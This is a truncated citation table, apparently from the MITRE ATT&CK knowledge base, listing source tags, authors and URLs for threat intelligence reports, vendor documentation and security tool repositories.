Hybrid AnalHybrid Anahttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f
Hybrid AnaHybrid Anahttps://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f
20 macOS Phil Stoke https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
Trend MicrCybercrimehttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-sprea
Cylance Cl Cylance. ( https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/
US-CERT T US-CERT. ( https://www.us-cert.gov/ncas/alerts/TA18-086A
pubprn Jason Geren https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
Enigma0x3Nelson, M.https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
ZDNET SellCimpanu, C. https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dar
Medium Det French, D. https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
AdSecurityMetcalf, S https://adsecurity.org/?p=1729
Microsoft Microsoft. https://msdn.microsoft.com/library/cc228086.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/cc237008.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/dd207691.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/cc245496.aspx
PowersploiPowerSploit https://github.com/mattifestation/PowerSploit
Samba DRSSambaWiki.https://wiki.samba.org/index.php/DRSUAPI
Harmj0y DCSchroeder,http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
Brining Mi Tim Wadhwa https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikat
RotaJakiro Alex Turin https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/
Apple Dev Apple. (201https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibra
Unit42 OceErye Hernahttps://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/
Microsoft Microsoft. https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library
Linux ShareWheeler, D.https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
Cisco AdvisCisco. (200https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SN
US-CERT T US-CERT. ( https://us-cert.cisa.gov/ncas/alerts/TA17-156A
US-CERT-T US-CERT. (2https://www.us-cert.gov/ncas/alerts/TA18-106A
format_cmCisco. (20 https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_thro
Unit 42 S Falcone, R https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
Palo Alto Falcone, R.http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
FireEye S FireEye. (2 https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Sha
Microsoft Russinovic https://docs.microsoft.com/sysinternals/downloads/sysmon
Symantec Symantec. https://www.symantec.com/connect/blogs/shamoon-attacks
Cisco DoSdCisco. (n.d https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-de
USNYAG IraPreet Bharahttps://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-enti
Elastic Ru Elastic Sec https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variab
ExpressVP ExpressVPNhttps://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/
uptycs FakNischay Hehttps://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
nixCraft m Vivek Gite https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/
Microsoft Microsoft. https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44
Github PowBialek, J. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
Hakobyan Hakobyan, http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin
A
LOLBAS EseLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Esentutl/
MSFT-AI Microsoft Thttps://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age
OpenAI-CTIOpenAI. (20https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
AWS OrganiAWS. (n.d. https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
AWS RE:InfBen Fletchehttps://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniq
Microsoft SDor Edry. https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-su
Microsoft Microsoft Ahttps://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campai
MacOS Emai Apple. (n.dhttps://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac
Microsoft Carr, N., S https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromis
Microsoft Microsoft. https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
Microsoft Microsoft. https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
Microsoft Niv Goldenb https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-micros
FireEye CybFireEye. (n https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf
Kevin MandKevin Mandi https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf
AnonymousAndy. (201https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-18
Trend MicrMarco Baldu https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf
File obfuscAspen Lindb https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
SFX - Encr Jai Minton.https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/
WHOIS NTT Americhttps://www.whois.net/
DNS DumpsHacker Targhttps://dnsdumpster.com/
Circl Passi CIRCL Compuhttps://www.circl.lu/services/passive-dns/
Cloudflare Cloudflare.https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/
Corero SYNCorero. (n. https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html
Arbor AnnuPhilippe Al https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Re
CrowdStrikKurtz, G. ( https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
BlackHat MPan, M., Tshttp://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-
Symantec W Symantec. https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Rootkit
Wits End aDeRyke, A..https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html
ESET Turla Faou, M. anhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
Malware ArMalware Arhttp://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.p
Microsoft AMicrosoft. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?
Microsoft PMicrosoft. https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles
Apple AbouApple. (201https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutom
MDSec macDominic Che https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
Microsoft JMicrosoft. https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
Microsoft Microsoft. https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
JScrip MayMicrosoft. https://docs.microsoft.com/windows/win32/com/translating-to-jscript
NodeJS OpenJS Foun https://nodejs.org/
SentinelO Phil Stokeshttps://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
SpecterOpsPitt, L. (2 https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
Red CanaryTony Lamber https://redcanary.com/blog/clipping-silver-sparrows-wings/
DNS-CISA CISA. (201 https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domai
Alexa-dns Scanning Alhttps://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
Sean MetcaSean Metcahttps://x.com/PyroTek3/status/1126487227712921600
Trails-DNS SecurityTrahttps://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
AWS StoragAWS. (n.d.)https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
GCP Storage Google Clohttps://cloud.google.com/storage/docs/lifecycle
Azure StoraMicrosoft Ahttps://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=az
Palo Alto Ofir Balas https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
Datadog S3Stratus Redhttps://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
ESET Attor Hromcova,https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf
AppleDocsApple. (n.dhttps://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
TechNet SeMicrosoft. https://technet.microsoft.com/en-us/library/cc772408.aspx
OSX Malwar Patrick Warhttps://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
Volexity ViAdair, S. ( https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-ac
Unit 42 Hi Chen, J. et https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
Trend MicrRemillano Ihttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-expos
Malware PePatrick Warhttps://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
Writing Ba Patrick Warhttps://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
Krebs Disc Brian Kreb https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
Unit 42 MaChen, Y., Hhttps://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
Kaspersky GReAT. (201 https://securelist.com/project-tajmahal/90240/
Github evilGretzky, Kuhttps://github.com/kgretzky/evilginx2
GitHub MaOrrù, M., Thttps://github.com/muraenateam/muraena
Pass The CRehberger,https://wunderwuzzi23.github.io/blog/passthecookie.html
Talos Robl Tiago Pereihttps://blog.talosintelligence.com/roblox-scam-overview/
KubernetesThe Kubernhttps://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
KubernetesThe Kuberne https://kubernetes.io/docs/concepts/workloads/controllers/job/
Threat MatWeizman, Y. https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
Elastic Pre Ahuja, A., https://arxiv.org/pdf/1611.00791.pdf
Talos CCle Brumaghin,http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
Pace UniveChen, L., Whttp://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
FireEye PODunwoody,https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
M
ESET SednitESET. (201 https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
Data DriveJacobs, J. https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
Akamai DGA Liu, H. and https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
Cisco UmbrScarfo, A. https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
CybereasonSternfeld, http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real
Unit 42 DGUnit 42. (2 https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
PCMag DouPCMag. (n.d https://www.pcmag.com/encyclopedia/term/double-extension
SOCPrime D Eugene Tkac https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/
Seqrite Do Seqrite. (n https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
Davidson Davidson, Lhttp://www.pretentiousname.com/misc/win7_uac_whitelist2.html
TechNet H Lich, B. (2 https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
SANS UAC Medin, T. (http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
MSDN COMMicrosoft. https://msdn.microsoft.com/en-us/library/ms679687.aspx
enigma0x3Nelson, M.https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
enigma0x3Nelson, M.https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
enigma0x3Nelson, M.https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
TechNet InRussinovichhttps://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
Fortinet FaSalvio, J., https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-mal
Github UA UACME Proj https://github.com/hfiref0x/UACME
Twilio SMSTwilio. (20 https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
Twilio SMSTwilio. (n https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
sudo man Todd C. Mihttps://www.sudo.ws/
OSX.Dok MThomas Reed https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
cybereasonAmit Serpehttps://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does
ESET SednitESET. (201 http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
Mandiant Mandiant. https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
(
Wired RussGreenberg,https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/
Mandiant FMarvi, A. https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
Justice GR Office of P https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-contr
BBC-malverBBC. (2011,https://www.bbc.com/news/technology-12891182
FBI-search FBI. (2022 https://www.ic3.gov/Media/Y2022/PSA221221
sentinelon Hegel, Tom.https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijackin
spamhaus-m Miller, Sar https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-d
MasqueradTal, Nati. https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organ
K8s AuthorKubernetes. https://kubernetes.io/docs/reference/access-authn-authz/authorization/
CrowdStrikRed Team Lhttps://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
CISA AA20 CISA. (2021https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
Microsoft McMichael,https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2
TrustedSe Tyler Hudahttps://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-i
GitHub Cr Flathers, R https://github.com/Neohapsis/creddump7
McAfee CHIBeek, C., S https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
MITRE Cope Butterworth http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your
Intel Hack Intel Secur http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html
Github CHIIntel. (20 https://github.com/chipsec/chipsec
About UEFIUEFI Forum. http://www.uefi.org/about
MITRE Tru Upham, K. http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-secur
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/BIOS
Perez Site Adi Perez. https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover
ComparitecBischoff, P https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
Register R Darren Paulhttps://www.theregister.com/2015/05/19/robotstxt/
AWS Get BAmazon Web https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html
Palo Alto Dror Alon. https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Black Hill Felch, M.. https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
Google CloGoogle. (n.https://cloud.google.com/identity/docs/reference/rest
Microsoft AMicrosoft. https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0
GitHub RaiStringer, https://github.com/True-Demon/raindance
Tweet Regi@r0wdy_. https://x.com/r0wdy_/status/936365549553991680
(
insecure_rClément Lahttps://itm4n.github.io/windows-registry-rpceptmapper-eop/
Kansa ServiHull, D.. ( https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
malware_hiLawrence Ahttps://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
Autoruns fMark Russihttps://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
Registry KeMicrosoft. https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redir
microsoft_sMicrosoft. https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-ser
troj_zegostTrend Micrhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
Trendmicr Trendmicro. https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-no
Diginotar Fisher, D. https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
Recorded FInsikt Grouhttps://www.recordedfuture.com/research/cobalt-strike-servers
Splunk KovaKovar, R. ( https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
Let's Encr Let's Encry https://letsencrypt.org/docs/faq/
Unit42 DN Hinchliffe, https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
erase_cmd_ Cisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_thro
Novetta Bl Novetta Thhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads
Medium DnGalobardes, https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-
PAN DNS TPalo Alto Nhttps://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
AWS InstanAWS. (n.d.)https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
RedLock InHigashi, Mihttps://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse
Krebs Capi Krebs, B.. https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
External t Alex Rymdehttps://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
Apple Dev Apple. (n.dhttps://developer.apple.com/library/archive/documentation/Security/Conceptual/Security_Overview/A
OS X KeychJuuso Salonhttp://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain
OSX KeydnMarc-Etienn https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
ADSecurityMetcalf, S. https://adsecurity.org/?p=2716
Microsoft gMicrosoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
Github PowSchroeder,https://github.com/PowerShellEmpire/Empire
TechNet Grsrachui. (2 https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part
Mandiant Mandiant. https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
Lau 2011 Lau, H. (20 http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
